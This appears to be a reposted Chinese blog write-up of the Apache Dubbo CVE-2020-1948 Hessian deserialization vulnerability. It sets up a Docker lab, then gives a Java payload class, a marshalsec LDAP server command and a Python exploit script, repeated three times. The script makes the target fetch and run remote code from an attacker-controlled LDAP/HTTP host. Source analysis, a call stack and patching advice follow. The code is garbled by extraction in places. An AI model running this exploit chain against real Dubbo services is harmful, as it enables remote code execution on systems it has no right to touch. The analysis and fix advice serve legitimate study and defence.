昆山商城网站建设公司名高端大气不重名
news/
2025/9/23 2:40:42/
文章来源:
昆山商城网站建设,公司名高端大气不重名,中山做网站的公司哪家好,百度推广整体优化网站APache Dubbo简介
Dubbo是一个分布式服务框架#xff0c;致力于提供高性能和透明化的RPC远程服务调用方案#xff0c;以及SOA服务治理方案。简单的说#xff0c;dubbo就是个服务框架#xff0c;如果没有分布式的需求#xff0c;其实是不需要用的#xff0c;只有在分布式…APache Dubbo简介
Dubbo是一个分布式服务框架致力于提供高性能和透明化的RPC远程服务调用方案以及SOA服务治理方案。简单的说dubbo就是个服务框架如果没有分布式的需求其实是不需要用的只有在分布式的时候才有dubbo这样的分布式服务框架的需求并且本质上是个服务调用的东西说白了就是个远程服务调用的分布式框架告别Web Service模式中的WSDL以服务者与消费者的方式在dubbo上注册 其核心部分包含:
远程通讯: 提供对多种基于长连接的NIO框架抽象封装包括多种线程模型序列化以及“请求-响应”模式的信息交换方式。集群容错: 提供基于接口方法的透明远程过程调用包括多协议支持以及软负载均衡失败容错地址路由动态配置等集群支持。自动发现: 基于注册中心目录服务使服务消费方能动态的查找服务提供方使地址透明使服务提供方可以平滑增加或减少机器。
下图是官方的工作原理图和解释 async 异步 sync 同步 Provider :暴露服务方称为服务提供者Consumer :调用远程服务方称为服务消费者Rrgister服务注册与发现的中心目录服务称之为服务注册中心Monitor统计服务的调用次数和 时间的日志服务称为服务监控中心Container服务运行容器
Provider将本地提供的远程方法在注册中心进行注册Consumer需要调用时会先去注册中心进行查询根据注册中心返回的结果再去对应的Provider中调用对应的远程方法如果有变更注册中心将基于长连接推送变更数据给Consumer 。
启动注册中心Apache dubbo 推荐使用的注册中心时Apache ZooKeeper注册中心 下载地址Apache ZooKeeper
环境复现
影响版本 Dubbo 2.7.0 - 2.7.6 Dubbo 2.6.0 - 2.6.7 Dubbo 2.5.x docker操作
docker pull dsolab/dubbo:cve-2020-1948
docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d
漏洞利用
编写java代码进行简单的命令执行这里以ping命令为例用检测无回显的dnslog用于验证
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;public class exp {public exp(){try {java.lang.Runtime.getRuntime().exec(ping zqmp97.dnslog.cn);} catch (java.io.IOException e) {e.printStackTrace();}}
}
编译java代码为class文件
javac poc.java
最后得到class文件这里遇到了一下javac -bash command not found的问题
使用如下命令解决
yum install java-1.8.0-openjdk-devel.x86_64
原因下载的时候只执行了yum install java,导致不是完整的jdk
参考链接https://www.cnblogs.com/sirdong/p/11987639.html
启动静态网站服务apache,nginx都可以这里以python 开启80端口的web服务为例
python -m SimpleHTTPServer 80 在另一个终端下载marshalsec,启动LDAP代理服务
下载地址: https://github.com/RandomRobbieBF/marshalsec-jar
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://vps/#exp 777
参考链接https://www.cnblogs.com/afanti/p/11266087.html
java 反序列化利用工具 marshalsec 使用简介-CSDN博客 LDAP轻型目录访问协议 英文 Lightweight Directory Access Protocol 是一个开放的中立的工业标准的 应用协议 通过 IP协议 提供访问控制和维护分布式信息的目录信息。轻型目录访问协议 英文 Lightweight Directory Access Protocol是一个开放的中立的工业标准的 应用协议通过 IP协议提供访问控制和维护分布式信息的目录信息。 marshalsec 的用法,使用形式如下 java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Marshaller [-a] [-v] [-t] [gadget_type [arguments...]] 参数说明 -a生成exploit下的所有payload(例如hessian下的SpringPartiallyComparableAdvisorHolder, SpringAbstractBeanFactoryPointcutAdvisor, Rome, XBean, Resin -t对生成的payloads进行解码测试 -vverbose mode, 展示生成的payloads gadget_type指定使用的payload arguments - payload运行时使用的参数 marshalsec.marshaller指定exploits根目录下的java文件名
编写python的脚本exp.py
在此之前需要安装模块
pip install dubbo-py # exp.py
# -*- coding: utf-8 -*-import sysfrom dubbodbcRowSetImpl.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClientif len(sys.argv) 4:print(Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL.format(sys.argv[0]))print(\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp.format(sys.argv[0]))sys.exit()client DubboClient(sys.argv[1], int(sys.argv[2]))JdbcRowSetImplnew_object(com.sun.rowset.JdbcRowSetImpl,dataSourcesys.argv[3],strMatchColumns[foo])
JdbcRowSetImplClassnew_object(java.lang.Class,namecom.sun.rowset.JdbcRowSetImpl,)
toStringBeannew_object(com.rometools.rome.feed.impl.ToStringBean,beanClassJdbcRowSetImplClass,objJdbcRowSetImpl)resp client.send_request_and_return_response(service_nameorg.apache.dubbo.spring.boot.sample.consumer.DemoService,# 此处可以是 $invoke、$invokeSync、$echo 等通杀 2.7.7 及 CVE 公布的所有版本。method_name$invoke,args[toStringBean])output str(resp)
if Fail to decode request due to: RpcInvocation in output:print([!] Target maybe not support deserialization.)
elif EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString() in output:print([] Succeed.)
else:print([!] Output:)print(output)print([!] Target maybe not use dubbo-remoting library.)
# exp.py
# -*- coding: utf-8 -*-import sysfrom dubbodbcRowSetImpl.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClientif len(sys.argv) 4:print(Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL.format(sys.argv[0]))print(\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp.format(sys.argv[0]))sys.exit()client DubboClient(sys.argv[1], int(sys.argv[2]))JdbcRowSetImplnew_object(com.sun.rowset.JdbcRowSetImpl,dataSourcesys.argv[3],strMatchColumns[foo])
JdbcRowSetImplClassnew_object(java.lang.Class,namecom.sun.rowset.JdbcRowSetImpl,)
toStringBeannew_object(com.rometools.rome.feed.impl.ToStringBean,beanClassJdbcRowSetImplClass,objJdbcRowSetImpl)resp client.send_request_and_return_response(service_nameorg.apache.dubbo.spring.boot.sample.consumer.DemoService,# 此处可以是 $invoke、$invokeSync、$echo 等通杀 2.7.7 及 CVE 公布的所有版本。method_name$invoke,args[toStringBean])output str(resp)
if Fail to decode request due to: RpcInvocation in output:print([!] Target maybe not support deserialization.)
elif EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString() in output:print([] Succeed.)
else:print([!] Output:)print(output)print([!] Target maybe not use dubbo-remoting library.)
执行相应的py脚本
python exp.py 目标vps ldap://己方vps:777/exp
出现success的时候说明成功 然后观察dnslog也可以发现回显 同时我们可以留意一下相关的LDAP服务当出现转发成功的时候自然也是成功的 参考文章Apache Dubbo CVE-2020-1948 反序列化漏洞利用-CSDN博客
原理研究
源码版本dubbo v2.7.6
下载地址https://github.com/apache/dubbo-spring-boot-project/tree/35568ff32d3a0fcbbd6b3e14a9f7c0a71b6b08ee
下载后将项目导入IDEA
我们开始分析一下现有的exp
poc1
# exp.py
# -*- coding: utf-8 -*-import sysfrom dubbodbcRowSetImpl.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClientif len(sys.argv) 4:print(Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL.format(sys.argv[0]))print(\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp.format(sys.argv[0]))sys.exit()client DubboClient(sys.argv[1], int(sys.argv[2]))JdbcRowSetImplnew_object(com.sun.rowset.JdbcRowSetImpl,dataSourcesys.argv[3],strMatchColumns[foo])
JdbcRowSetImplClassnew_object(java.lang.Class,namecom.sun.rowset.JdbcRowSetImpl,)
toStringBeannew_object(com.rometools.rome.feed.impl.ToStringBean,beanClassJdbcRowSetImplClass,objJdbcRowSetImpl)resp client.send_request_and_return_response(service_nameorg.apache.dubbo.spring.boot.sample.consumer.DemoService,# 此处可以是 $invoke、$invokeSync、$echo 等通杀 2.7.7 及 CVE 公布的所有版本。method_name$invoke,args[toStringBean])output str(resp)
if Fail to decode request due to: RpcInvocation in output:print([!] Target maybe not support deserialization.)
elif EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString() in output:print([] Succeed.)
else:print([!] Output:)print(output)print([!] Target maybe not use dubbo-remoting library.)
poc2
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClientclient DubboClient(127.0.0.1, 12345)JdbcRowSetImplnew_object(com.sun.rowset.JdbcRowSetImpl,dataSourceldap://127.0.0.1:8087/#ExportObject,strMatchColumns[foo])
JdbcRowSetImplClassnew_object(java.lang.Class,namecom.sun.rowset.JdbcRowSetImpl,)
toStringBeannew_object(com.rometools.rome.feed.impl.ToStringBean,beanClassJdbcRowSetImplClass,objJdbcRowSetImpl)resp client.send_request_and_return_response(service_nameorg.apache.dubbo.spring.boot.demo.consumer.DemoService,method_namerce,args[toStringBean])
不难发现该漏洞利用链最终是通过JdbcRowSetImpl调用jndi来进行远程代码执行。同时我们发现该gadget中用到了com.rometools.rome.feed.impl.ToStringBean所以Provider的pom.xml中需要添加rometools的引用
我们向dubbo-spring-boot-samples/auto-configure-samples/provider-samplepom.xml 添加依赖
dependencygroupIdcom.rometools/groupIdartifactIdrome/artifactIdversion1.7.0/version
/dependency
然后导入依赖
漏洞成因
本次漏洞利用的是 com.rometools.rome.feed.impl.ToStringBean#toString 方法重写了 toString该方法将会调用构造对象的所有 getter 方法 从上面 PoC 可以看到执行 Dubbo 调用时传入的是 ToStringBean 类型参数构造的对象是com.sun.rowset.JdbcRowSetImpl并且 datasource 属性设置的是 JNDI 暴露的 url在调用 JdbcRowSetImpl 的 getDatabaseMetaData 方法时执行 connect 操作下载远端代码在 Service Provider 执行造成攻击。 调起 toString 方法的地方是在 Dubbo Provider 接收 DecodeHandler#received:44 请求在 DecodeableRpcInvocation#decode 反序列化参数的地方 dubbo 默认使用的是 hession2 序列化解析参数执行的是这个方法
org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectInput#readUTF 在 hession 反序列化过程中通过下面代码段执行到了 ToStringBean#toString 堆栈利用链
connect:624, JdbcRowSetImpl (com.sun.rowset)
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
toString:158, ToStringBean (com.rometools.rome.feed.impl)
toString:129, ToStringBean (com.rometools.rome.feed.impl)
beanHashCode:198, EqualsBean (com.rometools.rome.feed.impl)
hashCode:180, EqualsBean (com.rometools.rome.feed.impl)
hash:339, HashMap (java.util)
put:612, HashMap (java.util)
doReadMap:145, MapDeserializer (com.alibaba.com.caucho.hessian.io)
readMap:126, MapDeserializer (com.alibaba.com.caucho.hessian.io)
readObject:2703, Hessian2Input (com.alibaba.com.caucho.hessian.io)
readObject:2278, Hessian2Input (com.alibaba.com.caucho.hessian.io)
readObject:2080, Hessian2Input (com.alibaba.com.caucho.hessian.io)
readObject:2074, Hessian2Input (com.alibaba.com.caucho.hessian.io)
readObject:92, Hessian2ObjectInput (org.apache.dubbo.common.serialize.hessian2)
decode:139, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo)
decode:79, DecodeableRpcInvocation (org.apache.dubbo.rpc.protocol.dubbo)
decode:57, DecodeHandler (org.apache.dubbo.remoting.transport)
received:44, DecodeHandler (org.apache.dubbo.remoting.transport)
run:57, ChannelEventRunnable (org.apache.dubbo.remoting.transport.dispatcher)
修复建议
删除 RpcInvocation 类的 toString 方法中输出的 arguments 参数,防范后反序列化攻击。同时对 Hessian 进行黑白名单加固来防范 Hessian 反序列化攻击。升级 2.7.7 版本并根据https://github.com/apache/dubbo/pull/6374/commits/8fcdca112744d2cb98b349225a4aab365af563de 的方法进行参数校验禁止将 Dubbo 服务端端口开放给公网或仅仅只对能够连接至 Dubbo 服务端的可信消费端IP开放Dubbo 协议默认采用 Hessian 作为序列化反序列化方式该反序列化方式存在反序列化漏洞。在不影响业务的情况下建议更换协议以及反序列化方式。具体更换方法可参考http://dubbo.apache.org/zh-cn/docs/user/references/xml/dubbo-protocol.html
参考文章
https://www.cnblogs.com/JingQ/p/13329083.html
https://www.cnblogs.com/zhengjim/p/13204194.html
https://www.cnblogs.com/zhengjim/p/13204194.html
Apache Dubbo (CVE-2020-1948) 反序列化漏洞及其补丁绕过深度分析
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/911141.shtml
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!